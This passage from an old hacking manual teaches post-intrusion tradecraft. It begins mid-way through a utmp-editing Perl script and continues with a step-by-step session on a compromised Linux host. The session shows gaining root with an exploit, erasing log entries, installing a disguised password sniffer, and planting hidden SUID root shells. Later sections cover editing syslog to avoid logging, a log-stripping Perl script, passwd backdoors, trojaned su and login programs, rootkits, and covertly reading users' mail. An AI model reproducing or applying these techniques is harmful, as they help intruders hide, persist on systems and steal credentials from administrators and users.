        my($m,$d,$y,$h,$mn,$s) = ();
      
        # If date is not defined, then return local current date and time.
        return time() if (!defined($datetime));
      
        $datetime =~ 
          s!^(\d{1,2})/(\d{1,2})/(\d{4}|\d{2})(?:\:(\d{2}):(\d{2})(?:\:(\d{2}))?)?!!;
        ($m, $d, $y, $h, $mn, $s) = ($1, $2, $3, $4, $5, $6);
        $m--;
      
        # Finalize time components and check them.
        $y = (($y < 70) ? "20":"19" . $y) if (length($y)==2); 
      
        # This checks for any *non-matched* portion of $datetime. If there is such
        # an animal, then there is illegal data specified. Also screens for undefined
        # components which HAVE to be in ANY valid date/time (ie, month, day, year).
        return undef if (!defined($m) || !defined($d) || !defined($y) || length($datetime));
      
        # Set time components with unspecified values.
        $s = 0 if (!defined($s));
        $mn = 0 if (!defined($mn));
        $h = 0 if (!defined($h));
      
        # Check for ranges.
        return undef if (($m > 11)    || ($h > 23)    || ($mn > 59)   || ($s > 59));
                           
        # Begin conversion to seconds since 1/1/70.
        my($sec_now,$sec_70)=();
        $sec_now=DaysSince999($m,$d,$y);
        return undef if (!defined($sec_now));
      
        $sec_now--;
        $sec_now = $sec_now*24*3600 + $h*3600 + $mn*60 + $s;
        $sec_70 =30610224000;
        return ($sec_now-$sec_70);
      }
      
      
      sub DaysSince999 {
        my($m,$d,$y)=@_;
        my($Ny,$N4,$N100,$N400,$dayofyear,$days)=();
        my($cc,$yy)=();
      
        $y=~ /^(\d{2})(\d{2})$/;
        ($cc,$yy)=($1,$2);
      
        # Number of full years since Dec 31, 0999
        $Ny=$y-1000;
      
        # Number of full 4th years (incl. 1000) since Dec 31, 0999
        $N4=int(($Ny-1)/4)+1;
        $N4=0         if ($y==1000);
      
        # Number of full 100th years (incl. 1000)
        $N100=$cc-9;
        $N100--       if ($yy==0);
      
        # Number of full 400th years
        $N400=int(($N100+1)/4);
      
        # Check to insure that information returns a valid day of year.
        $dayofyear=dayofyear($m,$d,$y);
        return undef if (!defined($dayofyear));
      
        # Compute day of year.
        $days= $Ny*365 + $N4 - $N100 + $N400 + $dayofyear;
      
        return $days;
      }
      
      
      sub dayofyear {
        my($m,$d,$y)=@_;
        my(@daysinmonth)=(31,28,31,30,31,30,31,31,30,31,30,31);
        my($daynum,$i)=();
        $daysinmonth[1]=29  if (!($y % 4));
      
        # Return error if we are given an invalid date.
        return undef if ($d > $daysinmonth[$m]);
      
        $daynum=0;
        for ($i=1; $i<$m; $i++) {
          $daynum += $daysinmonth[$i];
        }
        $daynum += $d;
        
        return $daynum;
      }
      
      
      ## END DATE ROUTINES.
            
      # End of script.
      
      0;
      
      --------------------- end of utmpman.pl
      
      -------------------------
      Chapter VI
      Cleaning the log files
      -------------------------
      
      ------------------------------
      Section 6A
      A walk around a hacked system
      -------------------------------
      
      I can't stress the importance of this enough! Clean, Clean!!!!  In this section
      I will take you on the system first hand and show you some basics on what to
      look for, and on how to wipe your presence from the system.  To start this lets
      logon a system:
      
      Here is the step by step through the basic process:
      
      ******----> see who is on the machine
      
      [/home/master]finger @victim.net
      [victim.net]
      No one logged on.
      
      ******----> good no one on, we will log on
      
      [/home/master]telnet victim.net
      
      Trying xxx.206.xx.140...
      Connected to victim.net.
      Escape character is '^]'.
      
      Welcome to Victim Research Linux (http://www.victim.net) Red Hat 2.1
      Kernel 1.2.13 on a i586
      
      
      ns.victim.net login: jnsmith
      Password:
      Linux 1.2.13.
      You have new mail.
      
      ******----> Don't read his mail, you can cat all mail in /var/spool/mail
                  and in each users /home/username/mail directory
      
      ******----> Check again to see if anyone is on
      
      [jnsmith@ns jnsmith]$ w
      
      5:36am  up 18 days,  8:23,  1 user,  load average: 0.01, 0.00, 0.00
      User     tty       login@  idle   JCPU   PCPU  what
      jnsmith   ttyp1     5:35am                      w
      
      ******----> Just me, lets get root and get lost in the utmp!
      
      [jnsmith@ns jnsmith]$ cd .term
      
      ******----> Nice directory to hide stuff ;)
      
      [jnsmith@ns .term]$ ./.u
      
      ******----> I had this already waiting, it was the umounc.c exploit
      
      Discovered and Coded by Bloodmask and Vio, Covin 1996
      
      ******----> We are now root, lets use z2 to become invisible
      
      bash# z2 jnsmith
      Zap2!
      
      ******----> Let's see if we are still on ...
      
      bash# w
      5:37am  up 18 days,  8:24,  0 users,  load average: 0.08, 0.02, 0.01
      User     tty       login@  idle   JCPU   PCPU  what
      
      ******----> Hmm. now there is no one on the system, i must have logged off ;)
      
      
      ******----> We know we are root, but lets check you you can see ...
      
      bash# whoami
      root
      bash#
      
      ******----> Yup, root ..  What directory are we in?
      
      bash# pwd
      /home/jnsmith/.term
      
      ******----> Let's check the logs
      
      bash# cd /var/log
      
      ******----> most of the time in /var/adm, this box uses /var/log
      
      bash# grep dormroom *
      maillog:Jan 29 05:31:58 ns in.telnetd[22072]: connect from dormroom.playhouse.com
      maillog:Jan 29 05:35:29 ns in.telnetd[22099]: connect from dormroom.playhouse.com
      
      ******----> Yup, the z2 took care of everything but this maillog ...
      
      bash# pico maillog
      
      ******----> in pico i did a ctrl w, and searched for dormroom then ctrl k to
                  delete lines
      
      
      ******----> These were the lines deleted
      
      Jan 29 05:31:58 ns in.telnetd[22072]: connect from dormroom.playhouse.com
      Jan 29 05:35:29 ns in.telnetd[22099]: connect from dormroom.playhouse.com
      
      bash# grep dormroom *
      
      ******----> Yup .. all clear ;)
      
      bash# w
      5:41am  up 18 days,  8:27,  0 users,  load average: 0.00, 0.00, 0.00
      User     tty       login@  idle   JCPU   PCPU  what
      
      ******----> Yup .. all clear here too ;)
      
      ******----> Lets show you how you would use lled and wted if the grep would
                  have shown something in those files
      
      bash# cd ~jnsmith/.term
      bash# lled
      bash# lled -c dormroom.playhouse
      Entries stored: 527 Entries removed: 0
      Now chmod lastlog.tmp and copy over the original /var/log/lastlog
      
      ******----> Nothing in the lastlog
      
      bash#
      bash# wted -e jnsmith
      Entries stored: 254 Entries removed: 0
      Now chmod wtmp.tmp and copy over the original /var/log/wtmp
      
      ******----> Nothing in the wtmp, both of these would have shown in the grep
                  we just did in the /var/log (just showing you the commands)
      
      ******----> Lets do some sniffing ...
      
      bash# pico linsniffer.c
      
      ******----> I changed this line to tell where i want the log to go:
      
      #define TCPLOG "/tmp/.pinetemp.000"
      
      ******----> lets look at what is running to think of a name that
                  looks almost like it belongs there
      
      bash# ps -aux
      
      root       143  0.0  0.0   84    0  ?  SW  Jan 10   0:01 (lpd)
      root       154  0.0  0.0  118    0  ?  SW  Jan 10   0:00 (smbd)
      root       163  0.0  0.5   76  176  ?  S   Jan 10   0:00 nmbd -D
      root       197  0.0  0.0   76    0 v03 SW  Jan 10   0:00 (getty)
      root       198  0.0  0.0   76    0 v04 SW  Jan 10   0:00 (getty)
      root       199  0.0  0.0   76    0 v05 SW  Jan 10   0:00 (getty)
      root       200  0.0  0.0   76    0 v06 SW  Jan 10   0:00 (getty)
      root       201  0.0  0.0   88    0 s00 SW  Jan 10   0:00 (uugetty)
      root       209  0.0  0.2   35   76  ?  S   Jan 10   0:01 (update)
      root       210  0.0  0.3   35  124  ?  S   Jan 10   0:03 update (bdflush)
      root     10709  0.0  1.4  152  452  ?  S   Jan 27   0:10 httpd
      root     11111  0.0  1.4  152  452  ?  S   Jan 27   0:07 httpd
      root     14153  0.0  0.8   70  268  ?  S   Jan 16   0:03 ./inetd
      root     14307  0.0  4.7 1142 1484  ?  S   Jan 16   1:16 ./named
      root     14365  0.0  0.0   76    0 v02 SW  Jan 16   0:00 (getty)
      root     17367  0.0  1.4  152  452  ?  S    11:01   0:02 httpd
      
      ******----> lets compile it and name it nmb
      
      bash# gcc linsniffer.c -o nmb
      
      ******----> lets load it ...
      
      bash# nmb&
      [1] 22171
      
      ******----> lets check the log file in /tmp
      
      bash#
      bash# cd /tmp
      bash# ls -al .pin*
      total 15691
      -rw-rw-r--   1 root     jnsmith          0 Jan 29 05:50 .pinetemp.000
      
      ******----> There it is, but we don't want our login to know about it!
      
      bash# chgrp root .pin*
      
      ******----> Lets look now ....
      
      bash# ls -al .pin*
      -rw-rw-r--   1 root     root            0 Jan 29 05:50 .pinttemp.000
      bash#
      
      ******----> This is good, Lets make an SUID shell so we don't have to
                  do this again.  (check for MD5 or other programs in the cron)
      
      bash# cd /bin
      bash# ls -l sh
      lrwxrwxrwx   1 root     root            4 Mar  1  1996 sh -> bash
      
      ******----> This is a sym link ...
      
      bash# ls -l bash
      -rwxr-xr-x   1 root     root       299296 Nov  2  1995 bash
      
      ******----> here is the real file ... lets see what to name it that
                  looks like it belongs
      
      bash# ls
      arch           df             ksh            ping           tar
      ash            dmesg          ln             ps             tcsh
      bash           dnsdomainname  login          pwd            true
      cat            domainname     ls             red            ttysnoops
      chgrp          echo           mail           rm             umount
      chmod          ed             mkdir          rmdir          uname
      chown          false          mknod          sed            vi
      cp             findterm       more           setserial      view
      cpio           gunzip         mount          sh             vim
      csh            gzip           mt             stty           zcat
      date           hostname       mv             su             zsh
      dd             kill           netstat        sync
      
      ******----> How about a new command in linux, most admin's won't know
                  the difference ;)  We will call it findhost
      
      bash# cp bash findhost
      
      ******----> ok, now lets have a look at our new unix command ...
      
      bash# ls -l findhost
      -rwxr-xr-x   1 root     jnsmith     299296 Jan 29 05:59 findhost
      
      ******----> We need to change the group owner, touch the file date,
                  and make it SUID
      
      bash# chgrp root findhost
      bash# ls -l findhost
      -rwxr-xr-x   1 root     root       299296 Jan 29 05:59 findhost
      
      bash# chmod +s findhost
      bash# ls -l findhost
      -rwsr-sr-x   1 root     root       299296 Jan 29 05:59 findhost
      
      bash# touch -t 111312331995 findhost
      bash# ls -l findhost
      -rwsr-sr-x   1 root     root       299296 Nov 13  1995 findhost
      
      bash# ls -l m*
      -rwxr-xr-x   1 root     root        64400 Oct 31  1995 mail
      -rwxr-xr-x   1 root     root         7689 Nov  2  1995 mkdir
      -rwxr-xr-x   1 root     root         7001 Nov  2  1995 mknod
      -rwxr-xr-x   1 root     root        20272 Nov  1  1995 more
      -rwsr-xr-x   1 root     root        26192 Nov  1  1995 mount
      -rwxr-xr-x   1 root     root         8381 Oct 31  1995 mt
      -rwxr-xr-x   1 root     root        12753 Nov  2  1995 mv
      
      ******----> Now it looks like it belongs ... lets see if
                  it gives us root, exit our current root shell..
      
      bash# exit
      
      [jnsmith@ns .term]$ cd /bin
      [jnsmith@ns /bin]$ whoami
      jnsmith
      [jnsmith@ns /bin]$ findhost
      [jnsmith@ns /bin]# whoami
      root
      
      [jnsmith@ns /bin]# cd
      
      ******----> cd {enter} takes us back to our home dir
      
      [jnsmith@ns jnsmith]# ls
      mail
      [jnsmith@ns jnsmith]# echo + +>test
      [jnsmith@ns jnsmith]# ls -l
      total 2
      drwx------   2 jnsmith   jnsmith       1024 Jan 11 22:47 mail
      -rw-rw-r--   1 root      root            4 Jan 29 06:11 test
      
      ******----> See now we are uid=0 gid=0
      
      [jnsmith@ns jnsmith]# rm test
      
      ******----> clean as we go .....
      
      [jnsmith@ns jnsmith]# w
      6:12am  up 18 days,  8:58,  0 users,  load average: 0.07, 0.02, 0.00
      User     tty       login@  idle   JCPU   PCPU  what
      
      ******----> Just making sure we are still alone ....
      
      [jnsmith@ns jnsmith]# ls -al /tmp/.p*
      total 15692
      -rw-rw-r--   1 root     root          157 Jan 29 06:10 .pinttemp.000
      
      ******----> were getting passwords already ;)
      
      [jnsmith@ns jnsmith]# ls -al
      total 32
      drwxrwx---   5 jnsmith   jnsmith   1024 Jan 29 06:11 .
      drwxr-xr-x  33 root      users     1024 Jan 22 16:53 ..
      -rw-r-----   1 jnsmith   jnsmith   1126 Aug 23  1995 .Xdefaults
      lrwxrwxrwx   1 jnsmith   jnsmith      9 Jan  1 21:40 .bash_history -> /dev/null
      -rw-r--r--   1 root      jnsmith     24 Jan  1 03:12 .bash_logout
      -rw-r--r--   1 root      jnsmith    220 Jan  1 03:12 .bash_profile
      -rw-r--r--   1 root      jnsmith    124 Jan  1 03:12 .bashrc
      -rw-rw-r--   1 root      jnsmith   5433 Jan 11 22:47 .pinerc
      drwxrwxr-x   2 jnsmith   jnsmith   1024 Jan 29 06:22 .term
      drwxr-x---   2 jnsmith   jnsmith   1024 Feb 17  1996 .xfm
      drwx------   2 jnsmith   jnsmith   1024 Jan 11 22:47 mail
      [jnsmith@ns jnsmith]#
      
      ******----> Make sure you place this sys link .bash_history to /dev/null so
                  you do not leave a history behind...
      
      This is the command to do it, but make sure you delete the old .bash_history
      if it is there.
      
      ln -s /dev/null .bash_history
      
      Ok logout ...
      
      Ok, there is another way!!!!!!
      
      If you can remember and make it a practice that you NEVER forget, get used to
      this.... EVERY TIME you login to an account type: unset HISTFILE
      
      This will tell the system to delete your history file when you logoff the
      system...   USE THIS!  Get into the practice!  DON'T FORGET!
      
      -----------
      Section 6B
      messages and syslog
      -----------
      
      In the log directory you will find a file called 'messages' each system is
      different as far as what is logged to what files or what file name.  Make
      sure to check in the /etc/syslog.conf file for additional logging to
      remote machines.  If this is being done you will see something like this:
      
      *.*                                 @somehostname.xxx
      
      Or just to check and see where the log files are going you can view this file
      /etc/syslog.conf.
      
      Here is a sample...
      
      bash# more syslog.conf
      # /etc/syslog.conf
      # For info about the format of this file, see "man syslog.conf" (the BSD man
      # page), and /usr/doc/sysklogd/README.linux.
      #
      # NOTE: YOU HAVE TO USE TABS HERE - NOT SPACES.
      # I don't know why.
      #
      
      *.=info;*.=notice                               /var/adm/messages
      *.=debug                                        /var/adm/debug
      *.warn                                          /var/adm/syslog
      *.warn                                          /root/.../syslog
      *.=crit;kern.none                               /var/adm/critical
      kern.info;kern.!err                             /var/adm/kernel-info
      mail.*;mail.!=info                              /root/.../mail
      mail,news.=info                                 /root/.../info
      mail.*;mail.!=info                              /var/adm/mail
      mail,news.=info                                 /var/adm/info
      *.alert                                         root,bob
      *.=info;*.=notice                               @quality.com
      *.=debug                                        @quality.com
      *.warn                                          @quality.com
      *.=crit;kern.none                               @quality.com
      kern.info;kern.!err                             @quality.com
      mail.*;mail.!=info                              @quality.com
      mail,news.=info                                 @quality.com
      
      Here some of the logs are going into a hidden directory in the /root directory
      and a copy of every alert and warning are being also sent to the logs at
      quality.com.  wtmp, utmp and lastlog are still local, so you can still be
      ok, just make sure not to use 'su' on a system like this.  Also notice above
      that alert messages are being mailed to root and bob on this system.
      
      Also take note that syslog, mail, and, info are being sent to the /var/adm
      directory to fool you into thinking all of the logs are in /var/adm!  If you
      edit /var/adm the admin can run a diff on the backup files in the /root dir.
      
      Ok, so you go to the /var/adm or /var/log directory and:
      
      grep yourhost * |more
      grep your ip * |more
      
      you see that some files are logging your connection, mark down what files
      are logging you and edit the /etc/syslog.conf file.  You will from trial
      and error in most cases make it skip the logging process of your domain.
      
      BUT, make sure to do a few things.  After you edit the file restart the
      syslogd.  You can do this by doing a ps -x
      
      $root> ps -x
      
      39  ?  S    1:29 /usr/sbin/syslogd
      
      find the syslogd and notice the process id here is 39, so you do:
      
      kill -HUP 39
      
      This will restart the process and put your changes into effect.
      
      The other thing is to make sure to do a ls -l /etc/syslog.conf BEFORE you
      edit it and touch the file date back to the original date and time after
      you edit it.  This way if they notice the logging looks different, they
      will check the file date and think it must be something else.  Most admins
      would not know how to setup this file in the first place, so you in some
      (or most) cases ok to edit it.
      
      Here is another file to look at.
      
      /etc/login.defs
      
      # Enable "syslog" logging of su activity - in addition to sulog file logging
      # SYSLOG_SG_ENAB does the same for newgrp and sg.
      #
      SYSLOG_SU_ENAB          yes
      SYSLOG_SG_ENAB          yes
      #
      # If defined, all su activity is logged to this file
      #
      SULOG_FILE      /home/users/bob/.list
      
      Notice here that there is an su log file in a hidden file in one of
      the admin's directories.
      
      -----------
      Section 6C
      xferlog
      -----------
      
      The xferlog can be edited with your favorite text editor, pico, joe, vi, etc..
      you can then search for your transfers and delete the lines and save the file.
      You will need to do this after transferring any files.
      
      You will also want to grep the files in the /usr/local/etc/httpd/log directory
      if you have used the web or phf on the system to remove your presence
      from there.
      
      grep (username or hostname) * |more
      
      If you need to find the logs for httpd you can do a find -name httpd.conf
      -print and view the config file you see where the httpd logs are going.
      
      There might be different ftp logs for transfers in some ftp or virtual ftp
      directory some where.  View the files in the /etc/ftp* to find what the ftp
      setup is on the box.
      
      Here I have shown you to edit log files using pico, joe, or other editors.
      
      There is another way... Sometimes log files might be real large and the editor just might
      not cut it ;)  Here is what to do...
      
      You have a messages file 20 meg ... wow!
      
      If you want to get the lines that have fudge.candy.com out of this file you
      might want to do this:
      
      grep -v fudge.candy >messages.2
      rm messages
      mv messages2 messages
      
      then kill -HUP 
      
      -v means grep everything that does not match the line, so you are greping
      the file -what you do not want to a new file name messages.2.  Check the
      file size after the grep to make sure no errors were made and replace the
      old one with the new one and restart syslogd.
      
      This can also be used with other logs like xferlog, syslog, etc...
      
      Here is a perl script that will do it for you from command line.
      
      ------------------- start of riptext.pl
      #!/usr/bin/perl
      #
      # RipText - Takes regular expression and filename argument from @ARGV. Any 
      #           lines MATCHING regular expression will *not* be printed to 
      #           STDOUT. 
      # 
      #
      
      die("\nUsage: riptext [regexp] {filename}\n\n") if (!defined($ARGV[0]));
      ($regexp, $filename) = @ARGV[0,1];
      
      # Read in contents of file.
      $/ = undef;
      $contents="";
      if (!defined($filename)) {
        # Use STDIN.
        $contents = scalar ;
      } else {
        # Use FILE.
        open(FILE, "<$filename") || die("-RipText- Cannot open $filename: $!\n");
        $contents = scalar ;
        close(FILE);
      }
      
      @contents = split(/\n/, $contents);
      
      # Strip file of matching lines.
      open(FILE, ">$filename") || die("-RipText- Cannot write $filename: $!\n");
      foreach (@contents) {
        print FILE "$_\n" unless (/$regexp/i);
      }
      close(FILE);
      
      0;
      
      ------------------------ end of riptext.pl
      
      Remember to restart syslogd after you edit files, true you will not see
      the stuff, and it will be gone to your eyes, but if you do not restart the
      process, the data is still in memory and can be retrieved until you restart
      the process!
      
      Also look for notes in the syslog that the syslogd process was restarted at
      such and such a time.
      
      ---------------
      Section 6D
      The cron table
      ---------------
      
      Make sure to look at admin's and root cron files, here in this system we find
      a root cron file in: /var/spool/cron/crontabs
      bash# ls -l
      total 1
      -rw-------   1 root     root          851 Jan 26 14:14 root
      
      bash$ more root
      # This updates the database for 'locate' every day:
      40 07 * * *       updatedb 1> /dev/null 2> /dev/null
      40 */12 * * *       /sbin/checkfs
      
      there is a file running here in /sbin called checkfs.
      
      bash$ cd /sbin
      bash$ /sbin # more checkfs
      #!/bin/bash
      
      if [ ! -f /etc/default/fs/.check ]; then
        echo WARNING!! Filecheck default file cannot be found. Please regenerate.
          exit
          fi
      
      md5sum /usr/bin/* > /tmp/filecheck 2>/dev/null
      md5sum /usr/sbin/* >> /tmp/filecheck 2>/dev/null
      md5sum /sbin/* >> /tmp/filecheck 2>/dev/null
      md5sum /bin/* >> /tmp/filecheck 2>/dev/null
      md5sum /usr/local/bin/* >> /tmp/filecheck 2>/dev/null
      md5sum /usr/local/sbin/* >> /tmp/filecheck 2>/dev/null
      md5sum /lib/* >> /tmp/filecheck 2>/dev/null
      md5sum /usr/lib/* >> /tmp/filecheck 2>/dev/null
      diff /tmp/filecheck /etc/default/fs/.check > /tmp/filecheck2 2>&1
      
      if [ -s /tmp/filecheck2 ]; then
        mail -s FSCheck bin < /tmp/filecheck2
        fi
      
      rm /tmp/filecheck /tmp/filecheck2 2>/dev/null
      
      md5 is a checksum file, if you change or add a binary file to any of the
      above directories the information of the changes will be mailed to the
      admin.
      
      ------------------------------
      Chapter 7
      Keeping access to the machine
      ------------------------------
      
      There are many ways to keep access to the machine, you will loose
      access to many as you as you are learning, but I hope with this manual
      and some experience you will become a stable hacker.
      
      Section 7A
      Tricks of the trade
      
      Here are some 'tricks' of the trade that will help you keep access
      to the machine.  After a system admin has found you out, they will be watching
      for you and going through everything on the system.  They will go as far as
      recompiling binary files, changing everyone's passwords, denying your host you
      came in from to the machine, going through the passwd or shadow file, looking
      for SUID files, etc....
      
      When you see that you have been found out, do not try to get access to the
      system again.  I have seen others right after being cought, try everyone of
      their trojans, other accounts, and other backdoor's they placed for continued
      access.  Well think about it, they are watching for you ... you are showing
      them every in that you have to the system, and every exploitable file you
      are making known to them.
      
      NO!  WAIT!  Give it a few months, they will think everything is ok, and they
      will relax and you can come in with one of the backdoor's they missed, and you
      can do your thing on the logs for all of the attempts you made on the system
      to get back in.
      
      Ok here are some tricks of the trade.
      
      History Files:
      --------------
      Always put your .bash_history to /dev/null, if you don't make sure you at least
      edit it.  Remember the .bash_history will always have your last commands until
      the logoff.  So if you edit it, it will show that you are editing it. You might
      try changing your shell and editing it there, but this all seems like a pain,
      just set it to /dev/null
      
      1. Delete the file in the user directory .bash_history if it there.
      2. Type this command in the home directory: ln -s /dev/null .bash_history
      
      Nested directory:
      -----------------
      Always find a directory on the system to hide your files.  There are a few good
      ones that most users never look into.
      
      In the users home directory look for .term, all you will find in this directory
      is an executable file called termrc.  Admin's and users alike are used to seeing this
      hidden directory, and never EVER go into it.  if they did what do you think
      they would say to an executable file being in there called termrc?  You are right!
      Nothing .... it belongs there and it is what they expect to see there.
      
      So lets say we make termrc a little bigger, and add suid perm's ... are you
      getting the idea???? I hope you guessed it... go to the /bin directory and
      type cp bash (or sh whatever is there) ~username/.term/termrc
      then type : chown root ~username/.term/termrc
                : chgrp root ~username/.term/termrc
                : chmod +s ~username/.term/termrc
      
      Now you have a nested file that can get you root on the system any time that
      will not be easy for the admin to find.  If you want to get fancy, touch
      the file date to make it look like an older file.
      
      Another directory off the user accounts expected to be there and unused would
      be .elm, .term or Mail, or try making a directory called '...' this is harder
      to notice seeing the first directories that show are . and .., so it can go
      un-noticed easy.  This is how it would look if they did a long ls:
      
      1024 Jan 29 21:03 .
      1024 Dec 28 00:12 ..
      1024 Jan 29 21:03 ...
       509 Mar 02  1996 .bash_history
        22 Feb 20  1996 .forward
       164 May 18  1996 .kermrc
        34 Jun 06  1993 .less
       114 Nov 23  1993 .lessrc
      1024 May 18  1996 .term
      1024 May 19  1996 public_html
      
      see how it seems to just fit into place?
      
      but if it was just a ls -l, this is what would be seen:
      
      1024 May 19  1996 public_html
      
      Remember you can always look for some REAL LONG file path that you are sure
      that no one would ever even want to enter into, and use this for your nested
      directory.  You can even make your own directory there like:(...) ;)
      
      
      Making new commands
      --------------------
      After you check the cron to see if there is md5 being used there, you might
      want to either copy one of your exploits to another filename in the system,
      or maybe just overwrite a command that you know would never be used.  If
      you copy to a new file name make sure you touch the file date.  This is not
      so long lasting because sooner or later they will patch the exploit and your
      new file you made will not work anymore.
      
      It is better to use a shell for the new filename, and then make it suid.
      
      Adding or changing passwd entry's
      ---------------------------------
      Another backdoor that you can use is to add a new user to the passwd file.
      This needs to be done with caution making it look like it belongs there.
      Never use your passwd addition, never login, it is just for a backup in case
      you loose access.
      
      There are different thoughts here: you do not have to make it a root account
      that could cause notice to it right away.  You know you can have root any time
      you want it.  Lets practice ...
      
      We want to make our account look like it belongs, so lets keep to the top of
      the file.
      
      root:fVi3YqWnkd4rY:0:0:root:/root:/bin/bash
      sysop:mZjb4XjnJT1Ys:582:200:System Operator:/home/sysop:/bin/bash
      bin:*:1:1:bin:/bin:
      daemon:*:2:2:daemon:/sbin:
      adm:*:3:4:adm:/var/adm:
      lp:*:4:7:lp:/var/spool/lpd:
      sync:*:5:0:sync:/sbin:/bin/sync
      shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
      halt:*:7:0:halt:/sbin:/sbin/halt
      mail:*:8:12:mail:/var/spool/mail:
      news:*:9:13:news:/usr/lib/news:
      uucp:*:10:14:uucp:/var/spool/uucppublic:
      operator:*:11:0:operator:/root:/bin/bash
      games:*:12:100:games:/usr/games:
      man:*:13:15:man:/usr/man:
      postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
      nobody:*:65535:100:nobody:/dev/null:
      ftp:*:404:1::/home/ftp:/bin/bash
      
      Looking at the above passwd file leaves us a few options so i will just list
      them here.
      
      1. Look at the user line for operator, ftp, and postmaster.  All of these
      accounts have shells with no passwd's set yet.  From your shell just type:
      
      passwd postmaster
      
      Set the account with no passwd by just pressing enter.  Now you will be able
      to log into this account any time without a password and the file will still
      look right to the admin.
      
      2. add this line to the passwd file:
      
      syst::13:12:system:/var/spool:/bin/bash
      
      Place it in the file where it seems to flow.  You can leave the :: for the
      passwd or set the passwd to what you want by typing: passwd syst from the
      root shell.  Set the group and id above to what you like.
      
      
      3. Look at the line above for sync
      
      sync:*:5:0:sync:/sbin:/bin/sync
      
      Change this to :
      
      sync:*:5:0:sync:/sbin:/bin/bash and then run  and leave the passwd
      blank.  (or set a passwd don't matter) On this account we are even gid=0 rin
      
      Installing games
      ----------------
      
      You could always install exploitable doom or abuse into the system if they
      already have games installed.  I will include the root exploits for these
      games below in the appendix.
      
      Always be watching
      ------------------
      
      Always know who the admin's are on a system, you can find them by looking at
      the passwd file to see home directories, placement of the uid, group access
      accounts, and ALWAYS read all of the bash_history files in the user directories
      to see who is using admin commands.  You will also learn allot of new commands
      from reading history files, but you want to know who is who on the system.
      Get to know your system well. Look for users using su:  View the log files
      to see who is using admin commands.
      
      Always be watching the system, keep track of who is on while you are.  Watch
      the admin's history to see what commands they are using, ttysnoops? too many
      ps commands?  finger commands after ps or w or who commands will show they
      are watching what other users on the system are doing.  Watch your admin's
      and get to know how aware they are of users on their system.
      
      Reading system mail
      
      Rember first NEVER to use system mail programs!  They will be able to tell you
      are reading their mail.  I use a combo of a few things.  Here you go...
      
      1. cd /var/spool/mail
      
      This will put you into the directory that holds all of the unread mail, or
      waiting mail.  Now you can do things like:
      
      grep -i security * |more
      grep -i hack * |more
      grep -i intruder * |more
      grep -i passwd * |more
      grep -i password * |more
      
      Then if needed pico username, and ctrl w to search for your maeesge.  You
      can also delete messages if you see some other admin is telling them that
      your user name is hacking their machine from their domain.
      
      For a mail reader that will allow toy to read mail without updating pointers
      try:
      
      http://obsidian.cse.fau.edu/~fc
      has a util on it that can cat /var/spool/mail files without changing the
      last read dates.. ie they have no idea that you have read their mail.
      
      Also remember you can find other system mail in user's directories.  Make sure
      to look in the /root directory.  Look for /root/mail or username/mail or other
      directories or filders that contain older mail.
      
      Happy Hunting ...
      
      --------------------------------
      Section 7B
      Root and Demon kits and trojans
      --------------------------------
      
      Root kits are C source for ps, login, netstat and sometimes some other
      programs that have been hacked for you.  With these kits you will be
      able to replace the login files on the hacked box so that you can login
      without an account on the machine.
      
      You will also be able to patch ps so that you will not show up when an
      admin uses the ps command.  With the ps patch you can also have it not show
      processes that have certain file names such as any file that starts with
      'sniff'.
      
      Demon kits will have hacked programs for identd, login demon, ping, su,
      telnetd, and, socket.
      
      Trojans will be any file that you can use that will allow you to exploit
      the system in some way.  An su trojan placed in the admin's directory would
      run the trojan su first after you change the export path for him ;) and report
      back that he typed the wrong passwd and delete the trojan file, but saving
      the password he typed to the /tmp directory.
      
      A login trojan would save all login passwords to a file on the machine
      for you.  I think you get the idea ;)
      
      Demon and Linux root kits have been uuencoded and attached to the end of
      appendix VI
      
      ******************************************
      * Appendix I - Things to do after access *
      ******************************************
      
      
      I think in this paper we have covered most of the things  you can do after
      access, so I will make this in the style of a checklist from a to z.
      
      a. learn who the admin's are on the system
      b. watch the system with ps -auxe and ps -auxef (if it works) and pstree to
         try and keep track of what others are doing
      c. read all of the bash history files or any history files you can find on the
         machine to learn more yourself, and to learn about the users
      d. make as many backdoor's into the system as you can that you are sure will
         not be found out
      e. keep the access to yourself, don't give out users passwords on the machine
         you get root on.
      f. always clean your utmp and wtmp right away when you login
      g. always clean your mess as you go along, this includes your xferlog and
         messages
      h. if you have root access make sure to read /etc/syslog.conf and
         /etc/login.defs to see how the system is logging
      i. before changing binary files look at the root cron to see what they are
         running.
      j. look for md5 on the system
      k. look for separate ftp logs
      l. make sure to clean the www logs if you ever send phf commands to the server
      m. make an suid root shell and place it somewhere on the system
      n. do only what you are sure of, don't do everything in this hacking manual all
         at once or you are asking to get cought
      o. only use nested directories, do not put files into user directories where
         all they need to do is type ls to see them
      p. don't add user accounts and think they will not notice you.
      q. don't use pine or other mail programs to read users mail. if you want to
         read mail go to the mail dir and read it from unix, new mail you will find
         in /var/spool/mail read it there.
      r. don't change the system so that other programs they have running will not
         work any more, they will be on you like fly's on shit
      s. don't delete files on the system unless you put them there
      t. do not modify their web pages, like i was here ... you are not a hacker you
         are a little kid wanting attention
      u. do not change any passwords on the system (unless you are doing it for
         access and have backed up the passwd file and replace it right after you
         login
      v. do not use any root account machines for irc access, or to load a bot on
      w. if your root account changes or you create files that are owned by the
         wrong group, be sure to chown the files
      x. do not use .rhosts if there is already one there that is being used
      y. never telnet or ftp to your account from the hacked box
      z. don't fuck up their machine! only do what you know how to do.
      
      ****************************************************
      * Appendix II - Hacking / Security WWW / ftp sites *
      ****************************************************
      
      IRC QuantumG #virus
      Quantum's Linux Page
      http://obsidian.me.fau.edu/~quantum
      Nice site for a bit of info and unix exploits!
      
      CyberToast's Files section
      Here you will find a nice selection of hacking, crackers, hex editors, viruses,
      cracks, phreaking, war dialers, scanners, and, misc files.
      www.ilf.net/~toast/files
      
      Reptiles Realm
      A nice site for many linux exploits
      www.users.interport.net/~reptile/linux
      
      FTP site loaded with all kinds of IRC, BOTS, UNIX EXPLOITS, VIRUSES and ZINES!
      http://ftp.giga.or.at/pub/hacker
      
      Linux Security Digest
      Lot's to look at here
      http://king.dom.de/~un/linux-security
      
      Linux Security Alert
      http://bach.cis.temple.edu/linux/linux-security/Linux-Alerts
      
      The Linux Security Home Page
      http://www.ecst.csuchico.edu/~jtmurphy
      
      These are good sites just to get you started, there are many links on these.
      Just make sure to browse in your favorite engine and search for words like:
      hack, linux, unix, crack ect....
      
      *********************************************************
      * Appendix III - More exploits for root or other access *
      *********************************************************
      
      
      ..........................................................................
      .                                                                        .
